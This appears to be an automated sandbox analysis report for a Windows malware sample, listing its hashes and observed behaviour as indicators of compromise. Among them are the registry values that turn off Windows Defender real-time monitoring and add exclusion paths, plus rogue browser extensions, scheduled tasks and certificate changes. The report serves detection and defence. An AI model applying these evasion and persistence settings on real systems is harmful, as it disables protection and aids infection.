Analysis
max time kernel: 127s
max time network: 131s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 27/10/2022, 16:51
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en
General
Target: file.exe
Size: 7.2MB
MD5: 7cd4ca0bedb444ad408d61114f7af4ba
SHA1: 1acf38f5c49906f9c6399b9982a042d2d62eac87
SHA256: e4a445576cdb625b8d6b4da226f0a19e6b6a7e85892f88614cdc94eb5140df24
SHA512: c4e6f6338ef1b0b3c70056d158fea7f9bb6baee89ccf14d62330bb29173cdf35ed3522389857ca1d37aea584a2d841888e01df38e8608b86187f586e1bb95fb4
SSDEEP: 196608:91OZ2vY/eUwt9gTHGC6z0IB9GFlKpoKvOYuavElHDuQ/3:3OQ4J0YiYQ9GgmYurlHDRP
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe |
| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pqzHHOUJlDLoC = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mbQXQWfiU = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yaZvCAUzKqxU2 = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yaZvCAUzKqxU2 = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mbQXQWfiU = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LNUBGVQNDOUn = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NRVKUIgAFoPoXkVB = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LNUBGVQNDOUn = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pqzHHOUJlDLoC = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NRVKUIgAFoPoXkVB = "0" | reg.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe |
Blocklisted process makes network request 1 IoCs
| flow | pid | Process |
| --- | --- | --- |
| 29 | 1720 | rundll32.exe |
Executes dropped EXE 4 IoCs
| pid | Process |
| --- | --- |
| 1116 | Install.exe |
| 1628 | Install.exe |
| 812 | vzXMZqI.exe |
| 1552 | xqcOwVf.exe |
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
| description | ioc | Process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe |
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
| description | ioc | Process |
| --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation | xqcOwVf.exe |
Loads dropped DLL 12 IoCs
| pid | Process |
| --- | --- |
| 1980 | file.exe |
| 1116 | Install.exe |
| 1116 | Install.exe |
| 1116 | Install.exe |
| 1116 | Install.exe |
| 1628 | Install.exe |
| 1628 | Install.exe |
| 1628 | Install.exe |
| 1720 | rundll32.exe |
| 1720 | rundll32.exe |
| 1720 | rundll32.exe |
| 1720 | rundll32.exe |
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | xqcOwVf.exe |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json | xqcOwVf.exe |
Drops file in System32 directory 23 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | vzXMZqI.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | vzXMZqI.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | xqcOwVf.exe |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | vzXMZqI.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 | xqcOwVf.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | xqcOwVf.exe |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | xqcOwVf.exe |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | xqcOwVf.exe |
Drops file in Program Files directory 13 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\VSHiTSx.xml | xqcOwVf.exe |
| File created | C:\Program Files (x86)\pqzHHOUJlDLoC\SMjlREb.dll | xqcOwVf.exe |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | xqcOwVf.exe |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | xqcOwVf.exe |
| File created | C:\Program Files (x86)\mbQXQWfiU\ONCvIzB.xml | xqcOwVf.exe |
| File created | C:\Program Files (x86)\yaZvCAUzKqxU2\keevExSFaWuPM.dll | xqcOwVf.exe |
| File created | C:\Program Files (x86)\yaZvCAUzKqxU2\FUQPhRZ.xml | xqcOwVf.exe |
| File created | C:\Program Files (x86)\LNUBGVQNDOUn\uDBZAzL.dll | xqcOwVf.exe |
| File created | C:\Program Files (x86)\mbQXQWfiU\evxFWP.dll | xqcOwVf.exe |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | xqcOwVf.exe |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | xqcOwVf.exe |
| File created | C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\waHdiqA.dll | xqcOwVf.exe |
| File created | C:\Program Files (x86)\pqzHHOUJlDLoC\chxTLJi.xml | xqcOwVf.exe |
Drops file in Windows directory 4 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Windows\Tasks\VifYLfsFUZBOnFr.job | schtasks.exe |
| File created | C:\Windows\Tasks\WxeKxhacHpvHIAGHf.job | schtasks.exe |
| File created | C:\Windows\Tasks\bvlIjxbhjqoskMIGsW.job | schtasks.exe |
| File created | C:\Windows\Tasks\JApWNoHZsVVCavdbE.job | schtasks.exe |
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
| pid | Process |
| --- | --- |
| 2044 | schtasks.exe |
| 1572 | schtasks.exe |
| 1780 | schtasks.exe |
| 916 | schtasks.exe |
| 960 | schtasks.exe |
| 2024 | schtasks.exe |
| 1748 | schtasks.exe |
| 308 | schtasks.exe |
| 1412 | schtasks.exe |
| 1612 | schtasks.exe |
| 1040 | schtasks.exe |
| 968 | schtasks.exe |
| 912 | schtasks.exe |
Enumerates system info in registry 2 TTPs 4 IoCs
| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe |
Modifies data under HKEY_USERS 64 IoCs
| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | xqcOwVf.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0089000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | xqcOwVf.exe |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9 | rundll32.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9 | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | xqcOwVf.exe |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9\WpadDecisionReason = "1" | xqcOwVf.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9\WpadDecisionTime = f018535935ead801 | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | xqcOwVf.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | rundll32.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | rundll32.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | xqcOwVf.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | xqcOwVf.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E}\WpadDecision = "0" | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E}\c2-5a-4e-28-52-a9 | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | xqcOwVf.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | xqcOwVf.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0089000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | rundll32.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | xqcOwVf.exe |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | xqcOwVf.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | xqcOwVf.exe |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E} | xqcOwVf.exe |
| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | xqcOwVf.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob not captured in this report] | xqcOwVf.exe |
Suspicious behavior: EnumeratesProcesses 28 IoCs
| pid | Process |
| --- | --- |
| 1080 | powershell.EXE |
| 1080 | powershell.EXE |
| 1080 | powershell.EXE |
| 1620 | powershell.EXE |
| 1620 | powershell.EXE |
| 1620 | powershell.EXE |
| 1424 | powershell.EXE |
| 1424 | powershell.EXE |
| 1424 | powershell.EXE |
| 544 | powershell.EXE |
| 544 | powershell.EXE |
| 544 | powershell.EXE |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
| 1552 | xqcOwVf.exe |
Suspicious use of AdjustPrivilegeToken 4 IoCs
| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 1080 | powershell.EXE |
| Token: SeDebugPrivilege | 1620 | powershell.EXE |
| Token: SeDebugPrivilege | 1424 | powershell.EXE |
| Token: SeDebugPrivilege | 544 | powershell.EXE |
Suspicious use of WriteProcessMemory 64 IoCs
| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1980 wrote to memory of 1116 | 1980 | file.exe | 28 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1116 wrote to memory of 1628 | 1116 | Install.exe | 29 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
